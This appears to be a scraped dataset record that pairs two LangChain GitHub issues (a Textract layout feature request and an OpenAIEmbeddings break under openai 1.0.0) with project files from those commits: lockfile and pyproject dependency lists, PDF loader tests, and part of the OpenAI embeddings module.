{file = "zstandard-0.21.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:b1367da0dde8ae5040ef0413fb57b5baeac39d8931c70536d5f013b11d3fc3a5"},
{file = "zstandard-0.21.0-cp39-cp39-win32.whl", hash = "sha256:db62cbe7a965e68ad2217a056107cc43d41764c66c895be05cf9c8b19578ce9c"},
{file = "zstandard-0.21.0-cp39-cp39-win_amd64.whl", hash = "sha256:a8d200617d5c876221304b0e3fe43307adde291b4a897e7b0617a61611dfff6a"},
{file = "zstandard-0.21.0.tar.gz", hash = "sha256:f08e3a10d01a247877e4cb61a82a319ea746c356a3786558bed2481e6c405546"},
]
[package.dependencies]
cffi = {version = ">=1.11", markers = "platform_python_implementation == \"PyPy\""}
[package.extras]
cffi = ["cffi (>=1.11)"]
[extras]
all = ["O365", "aleph-alpha-client", "amadeus", "arxiv", "atlassian-python-api", "awadb", "azure-ai-formrecognizer", "azure-ai-vision", "azure-cognitiveservices-speech", "azure-cosmos", "azure-identity", "beautifulsoup4", "clarifai", "clickhouse-connect", "cohere", "deeplake", "docarray", "duckduckgo-search", "elasticsearch", "esprima", "faiss-cpu", "google-api-python-client", "google-auth", "google-search-results", "gptcache", "html2text", "huggingface_hub", "jinja2", "jq", "lancedb", "langkit", "lark", "librosa", "lxml", "manifest-ml", "marqo", "momento", "nebula3-python", "neo4j", "networkx", "nlpcloud", "nltk", "nomic", "openai", "openlm", "opensearch-py", "pdfminer-six", "pexpect", "pgvector", "pinecone-client", "pinecone-text", "psycopg2-binary", "pymongo", "pyowm", "pypdf", "pytesseract", "python-arango", "pyvespa", "qdrant-client", "rdflib", "redis", "requests-toolbelt", "sentence-transformers", "singlestoredb", "tensorflow-text", "tigrisdb", "tiktoken", "torch", "transformers", "weaviate-client", "wikipedia", "wolframalpha"]
azure = ["azure-ai-formrecognizer", "azure-ai-vision", "azure-cognitiveservices-speech", "azure-core", "azure-cosmos", "azure-identity", "azure-search-documents", "openai"]
clarifai = ["clarifai"]
cli = ["typer"]
cohere = ["cohere"]
docarray = ["docarray"]
embeddings = ["sentence-transformers"]
extended-testing = ["aiosqlite", "aleph-alpha-client", "amazon-textract-caller", "anthropic", "arxiv", "assemblyai", "atlassian-python-api", "beautifulsoup4", "bibtexparser", "cassio", "chardet", "dashvector", "esprima", "faiss-cpu", "feedparser", "geopandas", "gitpython", "google-cloud-documentai", "gql", "html2text", "jinja2", "jq", "jsonschema", "lxml", "markdownify", "motor", "mwparserfromhell", "mwxml", "newspaper3k", "numexpr", "openai", "openai", "openapi-pydantic", "pandas", "pdfminer-six", "pgvector", "psychicapi", "py-trello", "pymupdf", "pypdf", "pypdfium2", "pyspark", "rank-bm25", "rapidfuzz", "rapidocr-onnxruntime", "requests-toolbelt", "rspace_client", "scikit-learn", "sqlite-vss", "streamlit", "sympy", "telethon", "timescale-vector", "tqdm", "upstash-redis", "xata", "xmltodict"]
javascript = ["esprima"]
llms = ["clarifai", "cohere", "huggingface_hub", "manifest-ml", "nlpcloud", "openai", "openlm", "torch", "transformers"]
openai = ["openai", "tiktoken"]
qdrant = ["qdrant-client"]
text-helpers = ["chardet"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.8.1,<4.0"
content-hash = "9345cd37346e9f369702f51b7e10dde8da91d5f7b659c8c204e5b46c360cd028"
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 12,068 | feat: Add Linearized output to Textract PDFLoader | ### Feature request
Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies different layout elements like tables, lists, figures, text-paragraphs and titles. This should be used by the AmazonTextractPDFParser to generate a linearized output to improve downstream LLMs accuracy with those hints.
Text output should render tables and key/value pairs and text in reading order for multi-column text and prefix lists with a *, when features like LAYOUT, TABLES, FORMS are passed to the textract call
### Motivation
Improve downstream LLM accuracy
### Your contribution
I'll submit a PR for this feature. | https://github.com/langchain-ai/langchain/issues/12068 | https://github.com/langchain-ai/langchain/pull/12446 | a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445 | 0c7f1d8b219e87e3ffd14a15a452622c532c7e95 | "2023-10-20T08:28:07Z" | python | "2023-10-31T01:02:10Z" | libs/langchain/pyproject.toml | [tool.poetry]
name = "langchain"
version = "0.0.326"
description = "Building applications with LLMs through composability"
authors = []
license = "MIT"
readme = "README.md"
repository = "https://github.com/langchain-ai/langchain"
[tool.poetry.scripts]
langchain-server = "langchain.server:main"
[tool.poetry.dependencies]
python = ">=3.8.1,<4.0"
pydantic = ">=1,<3"
SQLAlchemy = ">=1.4,<3"
requests = "^2"
PyYAML = ">=5.3"
numpy = "^1"
azure-core = {version = "^1.26.4", optional=true}
tqdm = {version = ">=4.48.0", optional = true}
openapi-pydantic = {version = "^0.3.2", optional = true}
faiss-cpu = {version = "^1", optional = true}
wikipedia = {version = "^1", optional = true}
elasticsearch = {version = "^8", optional = true}
opensearch-py = {version = "^2.0.0", optional = true}
redis = {version = "^4", optional = true}
manifest-ml = {version = "^0.0.1", optional = true}
nltk = {version = "^3", optional = true}
transformers = {version = "^4", optional = true}
beautifulsoup4 = {version = "^4", optional = true}
torch = {version = ">=1,<3", optional = true}
jinja2 = {version = "^3", optional = true}
tiktoken = {version = ">=0.3.2,<0.6.0", optional = true, python=">=3.9"}
pinecone-client = {version = "^2", optional = true}
pinecone-text = {version = "^0.4.2", optional = true}
pymongo = {version = "^4.3.3", optional = true}
clickhouse-connect = {version="^0.5.14", optional=true}
weaviate-client = {version = "^3", optional = true}
marqo = {version = "^1.2.4", optional=true}
google-api-python-client = {version = "2.70.0", optional = true}
google-auth = {version = "^2.18.1", optional = true}
wolframalpha = {version = "5.0.0", optional = true}
qdrant-client = {version = "^1.3.1", optional = true, python = ">=3.8.1,<3.12"}
dataclasses-json = ">= 0.5.7, < 0.7"
tensorflow-text = {version = "^2.11.0", optional = true, python = "^3.10, <3.12"}
tenacity = "^8.1.0"
cohere = {version = "^4", optional = true}
openai = {version = "^0", optional = true}
nlpcloud = {version = "^1", optional = true}
nomic = {version = "^1.0.43", optional = true}
huggingface_hub = {version = "^0", optional = true}
google-search-results = {version = "^2", optional = true}
sentence-transformers = {version = "^2", optional = true}
aiohttp = "^3.8.3"
arxiv = {version = "^1.4", optional = true}
pypdf = {version = "^3.4.0", optional = true}
networkx = {version=">=2.6.3, <4", optional = true}
aleph-alpha-client = {version="^2.15.0", optional = true}
deeplake = {version = "^3.8.3", optional = true}
pgvector = {version = "^0.1.6", optional = true}
psycopg2-binary = {version = "^2.9.5", optional = true}
pyowm = {version = "^3.3.0", optional = true}
async-timeout = {version = "^4.0.0", python = "<3.11"}
azure-identity = {version = "^1.12.0", optional=true}
gptcache = {version = ">=0.1.7", optional = true}
atlassian-python-api = {version = "^3.36.0", optional=true}
pytesseract = {version = "^0.3.10", optional=true}
html2text = {version="^2020.1.16", optional=true}
numexpr = {version="^2.8.6", optional=true}
duckduckgo-search = {version="^3.8.3", optional=true}
azure-cosmos = {version="^4.4.0b1", optional=true}
lark = {version="^1.1.5", optional=true}
lancedb = {version = "^0.1", optional = true}
pexpect = {version = "^4.8.0", optional = true}
pyvespa = {version = "^0.33.0", optional = true}
O365 = {version = "^2.0.26", optional = true}
jq = {version = "^1.4.1", optional = true}
pdfminer-six = {version = "^20221105", optional = true}
docarray = {version="^0.32.0", extras=["hnswlib"], optional=true}
lxml = {version = "^4.9.2", optional = true}
pymupdf = {version = "^1.22.3", optional = true}
rapidocr-onnxruntime = {version = "^1.3.2", optional = true, python = ">=3.8.1,<3.12"}
pypdfium2 = {version = "^4.10.0", optional = true}
gql = {version = "^3.4.1", optional = true}
pandas = {version = "^2.0.1", optional = true}
telethon = {version = "^1.28.5", optional = true}
neo4j = {version = "^5.8.1", optional = true}
langkit = {version = ">=0.0.6, <0.1.0", optional = true}
chardet = {version="^5.1.0", optional=true}
requests-toolbelt = {version = "^1.0.0", optional = true}
openlm = {version = "^0.0.5", optional = true}
scikit-learn = {version = "^1.2.2", optional = true}
azure-ai-formrecognizer = {version = "^3.2.1", optional = true}
azure-ai-vision = {version = "^0.11.1b1", optional = true}
azure-cognitiveservices-speech = {version = "^1.28.0", optional = true}
py-trello = {version = "^0.19.0", optional = true}
momento = {version = "^1.10.1", optional = true}
bibtexparser = {version = "^1.4.0", optional = true}
singlestoredb = {version = "^0.7.1", optional = true}
pyspark = {version = "^3.4.0", optional = true}
clarifai = {version = ">=9.1.0", optional = true}
tigrisdb = {version = "^1.0.0b6", optional = true}
nebula3-python = {version = "^3.4.0", optional = true}
mwparserfromhell = {version = "^0.6.4", optional = true}
mwxml = {version = "^0.3.3", optional = true}
awadb = {version = "^0.3.9", optional = true}
azure-search-documents = {version = "11.4.0b8", optional = true}
esprima = {version = "^4.0.1", optional = true}
streamlit = {version = "^1.18.0", optional = true, python = ">=3.8.1,<3.9.7 || >3.9.7,<4.0"}
psychicapi = {version = "^0.8.0", optional = true}
cassio = {version = "^0.1.0", optional = true}
rdflib = {version = "^6.3.2", optional = true}
sympy = {version = "^1.12", optional = true}
rapidfuzz = {version = "^3.1.1", optional = true}
jsonschema = {version = ">1", optional = true}
langsmith = "~0.0.52"
rank-bm25 = {version = "^0.2.2", optional = true}
amadeus = {version = ">=8.1.0", optional = true}
geopandas = {version = "^0.13.1", optional = true}
python-arango = {version = "^7.5.9", optional = true}
gitpython = {version = "^3.1.32", optional = true}
librosa = {version="^0.10.0.post2", optional = true }
feedparser = {version = "^6.0.10", optional = true}
newspaper3k = {version = "^0.2.8", optional = true}
amazon-textract-caller = {version = "<2", optional = true}
xata = {version = "^1.0.0a7", optional = true}
xmltodict = {version = "^0.13.0", optional = true}
markdownify = {version = "^0.11.6", optional = true}
assemblyai = {version = "^0.17.0", optional = true}
dashvector = {version = "^1.0.1", optional = true}
sqlite-vss = {version = "^0.1.2", optional = true}
motor = {version = "^3.3.1", optional = true}
anyio = "<4.0"
jsonpatch = "^1.33"
timescale-vector = {version = "^0.0.1", optional = true}
typer = {version= "^0.9.0", optional = true}
anthropic = {version = "^0.3.11", optional = true}
aiosqlite = {version = "^0.19.0", optional = true}
rspace_client = {version = "^2.5.0", optional = true}
upstash-redis = {version = "^0.15.0", optional = true}
google-cloud-documentai = {version = "^2.20.1", optional = true}
[tool.poetry.group.test.dependencies]
# The only dependencies that should be added are
# dependencies used for running tests (e.g., pytest, freezegun, response).
# Any dependencies that do not meet that criteria will be removed.
pytest = "^7.3.0"
pytest-cov = "^4.0.0"
pytest-dotenv = "^0.5.2"
duckdb-engine = "^0.9.2"
pytest-watcher = "^0.2.6"
freezegun = "^1.2.2"
responses = "^0.22.0"
pytest-asyncio = "^0.20.3"
lark = "^1.1.5"
pandas = "^2.0.0"
pytest-mock = "^3.10.0"
pytest-socket = "^0.6.0"
syrupy = "^4.0.2"
requests-mock = "^1.11.0"
[tool.poetry.group.codespell.dependencies]
codespell = "^2.2.0"
[tool.poetry.group.test_integration]
optional = true
[tool.poetry.group.test_integration.dependencies]
# Do not add dependencies in the test_integration group
# Instead:
# 1. Add an optional dependency to the main group
# poetry add --optional [package name]
# 2. Add the package name to the extended_testing extra (find it below)
# 3. Relock the poetry file
# poetry lock --no-update
# 4. Favor unit tests not integration tests.
# Use the @pytest.mark.requires(pkg_name) decorator in unit_tests.
# Your tests should not rely on network access, as it prevents other
# developers from being able to easily run them.
# Instead write unit tests that use the `responses` library or mock.patch with
# fixtures. Keep the fixtures minimal.
# See CONTRIBUTING.md for more instructions on working with optional dependencies.
# https://github.com/langchain-ai/langchain/blob/master/.github/CONTRIBUTING.md#working-with-optional-dependencies
pytest-vcr = "^1.0.2"
wrapt = "^1.15.0"
openai = "^0.27.4"
python-dotenv = "^1.0.0"
cassio = "^0.1.0"
tiktoken = "^0.3.2"
anthropic = "^0.3.11"
[tool.poetry.group.lint.dependencies]
ruff = "^0.1"
types-toml = "^0.10.8.1"
types-redis = "^4.3.21.6"
types-pytz = "^2023.3.0.0"
black = "^23.10.0"
types-chardet = "^5.0.4.6"
mypy-protobuf = "^3.0.0"
[tool.poetry.group.typing.dependencies]
mypy = "^0.991"
types-pyyaml = "^6.0.12.2"
types-requests = "^2.28.11.5"
[tool.poetry.group.dev]
optional = true
[tool.poetry.group.dev.dependencies]
jupyter = "^1.0.0"
playwright = "^1.28.0"
setuptools = "^67.6.1"
[tool.poetry.extras]
llms = ["clarifai", "cohere", "openai", "openlm", "nlpcloud", "huggingface_hub", "manifest-ml", "torch", "transformers"]
qdrant = ["qdrant-client"]
openai = ["openai", "tiktoken"]
text_helpers = ["chardet"]
clarifai = ["clarifai"]
cohere = ["cohere"]
docarray = ["docarray"]
embeddings = ["sentence-transformers"]
javascript = ["esprima"]
azure = [
"azure-identity",
"azure-cosmos",
"openai",
"azure-core",
"azure-ai-formrecognizer",
"azure-ai-vision",
"azure-cognitiveservices-speech",
"azure-search-documents",
]
all = [
"clarifai",
"cohere",
"openai",
"nlpcloud",
"huggingface_hub",
"manifest-ml",
"elasticsearch",
"opensearch-py",
"google-search-results",
"faiss-cpu",
"sentence-transformers",
"transformers",
"nltk",
"wikipedia",
"beautifulsoup4",
"tiktoken",
"torch",
"jinja2",
"pinecone-client",
"pinecone-text",
"marqo",
"pymongo",
"weaviate-client",
"redis",
"google-api-python-client",
"google-auth",
"wolframalpha",
"qdrant-client",
"tensorflow-text",
"pypdf",
"networkx",
"nomic",
"aleph-alpha-client",
"deeplake",
"pgvector",
"psycopg2-binary",
"pyowm",
"pytesseract",
"html2text",
"atlassian-python-api",
"gptcache",
"duckduckgo-search",
"arxiv",
"azure-identity",
"clickhouse-connect",
"azure-cosmos",
"lancedb",
"langkit",
"lark",
"pexpect",
"pyvespa",
"O365",
"jq",
"docarray",
"pdfminer-six",
"lxml",
"requests-toolbelt",
"neo4j",
"openlm",
"azure-ai-formrecognizer",
"azure-ai-vision",
"azure-cognitiveservices-speech",
"momento",
"singlestoredb",
"tigrisdb",
"nebula3-python",
"awadb",
"esprima",
"rdflib",
"amadeus",
"librosa",
"python-arango",
]
cli = [
"typer"
]
# An extra used to be able to add extended testing.
# Please use new-line on formatting to make it easier to add new packages without
# merge-conflicts
extended_testing = [
"aleph-alpha-client",
"amazon-textract-caller",
"aiosqlite",
"assemblyai",
"beautifulsoup4",
"bibtexparser",
"cassio",
"chardet",
"google-cloud-documentai",
"esprima",
"jq",
"pdfminer-six",
"pgvector",
"pypdf",
"pymupdf",
"pypdfium2",
"tqdm",
"lxml",
"atlassian-python-api",
"mwparserfromhell",
"mwxml",
"pandas",
"telethon",
"psychicapi",
"gql",
"requests-toolbelt",
"html2text",
"numexpr",
"py-trello",
"scikit-learn",
"streamlit",
"pyspark",
"openai",
"sympy",
"rapidfuzz",
"jsonschema",
"openai",
"rank-bm25",
"geopandas",
"jinja2",
"gitpython",
"newspaper3k",
"feedparser",
"xata",
"xmltodict",
"faiss-cpu",
"openapi-pydantic",
"markdownify",
"arxiv",
"dashvector",
"sqlite-vss",
"rapidocr-onnxruntime",
"motor",
"timescale-vector",
"anthropic",
"upstash-redis",
"rspace_client",
]
[tool.ruff]
select = [
"E", # pycodestyle
"F", # pyflakes
"I", # isort
]
exclude = [
"tests/integration_tests/examples/non-utf8-encoding.py",
]
[tool.mypy]
ignore_missing_imports = "True"
disallow_untyped_defs = "True"
exclude = ["notebooks", "examples", "example_data"]
[tool.coverage.run]
omit = [
"tests/*",
]
[build-system]
requires = ["poetry-core>=1.0.0"]
build-backend = "poetry.core.masonry.api"
[tool.pytest.ini_options]
# --strict-markers will raise errors on unknown marks.
# https://docs.pytest.org/en/7.1.x/how-to/mark.html#raising-errors-on-unknown-marks
#
# https://docs.pytest.org/en/7.1.x/reference/reference.html
# --strict-config any warnings encountered while parsing the `pytest`
# section of the configuration file raise errors.
#
# https://github.com/tophat/syrupy
# --snapshot-warn-unused Prints a warning on unused snapshots rather than fail the test suite.
addopts = "--strict-markers --strict-config --durations=5 --snapshot-warn-unused -vv"
# Registering custom markers.
# https://docs.pytest.org/en/7.1.x/example/markers.html#registering-markers
markers = [
"requires: mark tests as requiring a specific library",
"scheduled: mark tests to run in scheduled testing",
"compile: mark placeholder test used to compile integration tests without running them"
]
[tool.codespell]
skip = '.git,*.pdf,*.svg,*.pdf,*.yaml,*.ipynb,poetry.lock,*.min.js,*.css,package-lock.json,example_data,_dist,examples'
# Ignore latin etc
ignore-regex = '.*(Stati Uniti|Tense=Pres).*'
# whats is a typo but used frequently in queries so kept as is
# aapply - async apply
# unsecure - typo but part of API, decided to not bother for now
ignore-words-list = 'momento,collison,ned,foor,reworkd,parth,whats,aapply,mysogyny,unsecure,damon,crate,aadd,symbl,precesses,accademia,nin'
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 12,068 | feat: Add Linearized output to Textract PDFLoader | ### Feature request
Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies different layout elements like tables, lists, figures, text-paragraphs and titles. This should be used by the AmazonTextractPDFParser to generate a linearized output to improve downstream LLMs accuracy with those hints.
Text output should render tables and key/value pairs and text in reading order for multi-column text and prefix lists with a *, when features like LAYOUT, TABLES, FORMS are passed to the textract call
### Motivation
Improve downstream LLM accuracy
### Your contribution
I'll submit a PR for this feature. | https://github.com/langchain-ai/langchain/issues/12068 | https://github.com/langchain-ai/langchain/pull/12446 | a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445 | 0c7f1d8b219e87e3ffd14a15a452622c532c7e95 | "2023-10-20T08:28:07Z" | python | "2023-10-31T01:02:10Z" | libs/langchain/tests/integration_tests/document_loaders/test_pdf.py | from pathlib import Path
from typing import Sequence, Union
import pytest
from langchain.document_loaders import (
AmazonTextractPDFLoader,
MathpixPDFLoader,
PDFMinerLoader,
PDFMinerPDFasHTMLLoader,
PyMuPDFLoader,
PyPDFium2Loader,
PyPDFLoader,
UnstructuredPDFLoader,
)
def test_unstructured_pdf_loader_elements_mode() -> None:
"""Test unstructured loader with various modes."""
file_path = Path(__file__).parent.parent / "examples/hello.pdf"
loader = UnstructuredPDFLoader(str(file_path), mode="elements")
docs = loader.load()
assert len(docs) == 2
def test_unstructured_pdf_loader_paged_mode() -> None:
"""Test unstructured loader with various modes."""
file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
loader = UnstructuredPDFLoader(str(file_path), mode="paged")
docs = loader.load()
assert len(docs) == 16
def test_unstructured_pdf_loader_default_mode() -> None:
"""Test unstructured loader."""
file_path = Path(__file__).parent.parent / "examples/hello.pdf"
loader = UnstructuredPDFLoader(str(file_path))
docs = loader.load()
assert len(docs) == 1
def test_pdfminer_loader() -> None:
"""Test PDFMiner loader."""
file_path = Path(__file__).parent.parent / "examples/hello.pdf"
loader = PDFMinerLoader(str(file_path))
docs = loader.load()
assert len(docs) == 1
file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
loader = PDFMinerLoader(str(file_path))
docs = loader.load()
assert len(docs) == 1
def test_pdfminer_pdf_as_html_loader() -> None:
"""Test PDFMinerPDFasHTMLLoader."""
file_path = Path(__file__).parent.parent / "examples/hello.pdf"
loader = PDFMinerPDFasHTMLLoader(str(file_path))
docs = loader.load()
assert len(docs) == 1
file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
loader = PDFMinerPDFasHTMLLoader(str(file_path))
docs = loader.load()
assert len(docs) == 1
def test_pypdf_loader() -> None:
"""Test PyPDFLoader."""
file_path = Path(__file__).parent.parent / "examples/hello.pdf"
loader = PyPDFLoader(str(file_path))
docs = loader.load()
assert len(docs) == 1
file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
loader = PyPDFLoader(str(file_path))
docs = loader.load()
assert len(docs) == 16
def test_pypdfium2_loader() -> None:
"""Test PyPDFium2Loader."""
file_path = Path(__file__).parent.parent / "examples/hello.pdf"
loader = PyPDFium2Loader(str(file_path))
docs = loader.load()
assert len(docs) == 1
file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
loader = PyPDFium2Loader(str(file_path))
docs = loader.load()
assert len(docs) == 16
def test_pymupdf_loader() -> None:
"""Test PyMuPDF loader."""
file_path = Path(__file__).parent.parent / "examples/hello.pdf"
loader = PyMuPDFLoader(str(file_path))
docs = loader.load()
assert len(docs) == 1
file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
loader = PyMuPDFLoader(str(file_path))
docs = loader.load()
assert len(docs) == 16
assert loader.web_path is None
web_path = "https://people.sc.fsu.edu/~jpeterson/hello_world.pdf"
loader = PyMuPDFLoader(web_path)
docs = loader.load()
assert loader.web_path == web_path
assert loader.file_path != web_path
assert len(docs) == 1
def test_mathpix_loader() -> None:
file_path = Path(__file__).parent.parent / "examples/hello.pdf"
loader = MathpixPDFLoader(str(file_path))
docs = loader.load()
assert len(docs) == 1
print(docs[0].page_content)
file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
loader = MathpixPDFLoader(str(file_path))
docs = loader.load()
assert len(docs) == 1
print(docs[0].page_content)
@pytest.mark.parametrize(
"file_path, features, docs_length, create_client",
[
(
(
"https://amazon-textract-public-content.s3.us-east-2.amazonaws.com"
"/langchain/alejandro_rosalez_sample_1.jpg"
),
["FORMS", "TABLES"],
1,
False,
),
(str(Path(__file__).parent.parent / "examples/hello.pdf"), ["FORMS"], 1, False),
(
"s3://amazon-textract-public-content/langchain/layout-parser-paper.pdf",
None,
16,
True,
),
],
)
@pytest.mark.skip(reason="Requires AWS credentials to run")
def test_amazontextract_loader(
file_path: str,
features: Union[Sequence[str], None],
docs_length: int,
create_client: bool,
) -> None:
if create_client:
import boto3
textract_client = boto3.client("textract", region_name="us-east-2")
loader = AmazonTextractPDFLoader(
file_path, textract_features=features, client=textract_client
)
else:
loader = AmazonTextractPDFLoader(file_path, textract_features=features)
docs = loader.load()
assert len(docs) == docs_length
@pytest.mark.skip(reason="Requires AWS credentials to run")
def test_amazontextract_loader_failures() -> None:
# 2-page PDF local file system
two_page_pdf = str(
Path(__file__).parent.parent / "examples/multi-page-forms-sample-2-page.pdf"
)
loader = AmazonTextractPDFLoader(two_page_pdf)
with pytest.raises(ValueError):
loader.load()
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 12,943 | OpenAIEmbeddings() does not work because of these bugs | ### System Info
Python Version: 3.11
LangChain Version: 0.0.331
OpenAI Version: 1.0.0
### Who can help?
@hwchase17, @agola11, @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
The following error has been caused due to the recent change in version of OpenAI to 1.0.0
**Use OpenAI==0.28.1 to fix this error**
With the code:
`embeddings = OpenAIEmbeddings()`
The error produced is:
`AttributeError: module 'openai' has no attribute 'Embedding'. Did you mean: 'embeddings'?`
I went through the `langchain/embeddings/openai.py` file and then changed `value["client"] = openai.Embedding` to `value["client"] = openai.embeddings`, but then I receive this new error:
`AttributeError: module 'openai' has no attribute 'error'` in the same file (`langchain/embeddings/openai.py`)
### Expected behavior
There should be no error when calling this function. | https://github.com/langchain-ai/langchain/issues/12943 | https://github.com/langchain-ai/langchain/pull/12969 | fdbb45d79e69485e0892dadf48b32dc8efadde9b | 0c81cd923e04bb68fdf3ad299946d7fa85a21f9f | "2023-11-06T17:56:29Z" | python | "2023-11-07T02:52:33Z" | libs/langchain/langchain/embeddings/openai.py | from __future__ import annotations
import logging
import warnings
from typing import (
Any,
Callable,
Dict,
List,
Literal,
Optional,
Sequence,
Set,
Tuple,
Union,
)
import numpy as np
from tenacity import (
AsyncRetrying,
before_sleep_log,
retry,
retry_if_exception_type,
stop_after_attempt,
wait_exponential,
)
from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
logger = logging.getLogger(__name__)
def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]:
import openai
min_seconds = 4
max_seconds = 10
# Wait 2^x * 1 second between each retry starting with
# 4 seconds, then up to 10 seconds, then 10 seconds afterwards
return retry(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any:
import openai
min_seconds = 4
max_seconds = 10
# Wait 2^x * 1 second between each retry starting with
# 4 seconds, then up to 10 seconds, then 10 seconds afterwards
async_retrying = AsyncRetrying(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def wrap(func: Callable) -> Callable:
async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
async for _ in async_retrying:
return await func(*args, **kwargs)
raise AssertionError("this is unreachable")
return wrapped_f
return wrap
# https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings
def _check_response(response: dict, skip_empty: bool = False) -> dict:
if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty:
import openai
raise openai.error.APIError("OpenAI API returned an empty embedding")
return response
def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
retry_decorator = _create_retry_decorator(embeddings)
@retry_decorator
def _embed_with_retry(**kwargs: Any) -> Any:
response = embeddings.client.create(**kwargs)
return _check_response(response, skip_empty=embeddings.skip_empty)
return _embed_with_retry(**kwargs)
async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
@_async_retry_decorator(embeddings)
async def _async_embed_with_retry(**kwargs: Any) -> Any:
response = await embeddings.client.acreate(**kwargs)
return _check_response(response, skip_empty=embeddings.skip_empty)
return await _async_embed_with_retry(**kwargs)
class OpenAIEmbeddings(BaseModel, Embeddings):
"""OpenAI embedding models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key or pass it
as a named parameter to the constructor.
Example:
.. code-block:: python
from langchain.embeddings import OpenAIEmbeddings
openai = OpenAIEmbeddings(openai_api_key="my-api-key")
In order to use the library with Microsoft Azure endpoints, you need to set
the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION.
The OPENAI_API_TYPE must be set to 'azure' and the others correspond to
the properties of your endpoint.
In addition, the deployment name must be passed as the model parameter.
Example:
.. code-block:: python
import os
os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/"
os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key"
os.environ["OPENAI_API_VERSION"] = "2023-05-15"
os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080"
from langchain.embeddings.openai import OpenAIEmbeddings
embeddings = OpenAIEmbeddings(
deployment="your-embeddings-deployment-name",
model="your-embeddings-model-name",
openai_api_base="https://your-endpoint.openai.azure.com/",
openai_api_type="azure",
)
text = "This is a test query."
query_result = embeddings.embed_query(text)
"""
client: Any = None #: :meta private:
model: str = "text-embedding-ada-002"
deployment: str = model # to support Azure OpenAI Service custom deployment names
openai_api_version: Optional[str] = None
# to support Azure OpenAI Service custom endpoints
openai_api_base: Optional[str] = None
# to support Azure OpenAI Service custom endpoints
openai_api_type: Optional[str] = None
# to support explicit proxy for OpenAI
openai_proxy: Optional[str] = None
embedding_ctx_length: int = 8191
"""The maximum number of tokens to embed at once."""
openai_api_key: Optional[str] = None
openai_organization: Optional[str] = None
allowed_special: Union[Literal["all"], Set[str]] = set()
disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
chunk_size: int = 1000
"""Maximum number of texts to embed in each batch"""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout in seconds for the OpenAPI request."""
headers: Any = None
tiktoken_model_name: Optional[str] = None
"""The model name to pass to tiktoken when using this class.
Tiktoken is used to count the number of tokens in documents to constrain
them to be under a certain limit. By default, when set to None, this will
be the same as the embedding model name. However, there are some cases
where you may want to use this Embedding class with a model name not
supported by tiktoken. This can include when using Azure embeddings or
when using one of the many model providers that expose an OpenAI-like
API but with different models. In those cases, in order to avoid erroring
when tiktoken is called, you can specify a model name to use here."""
show_progress_bar: bool = False
"""Whether to show a progress bar when embedding."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
skip_empty: bool = False
"""Whether to skip empty strings when embedding or raise an error.
Defaults to not skipping."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
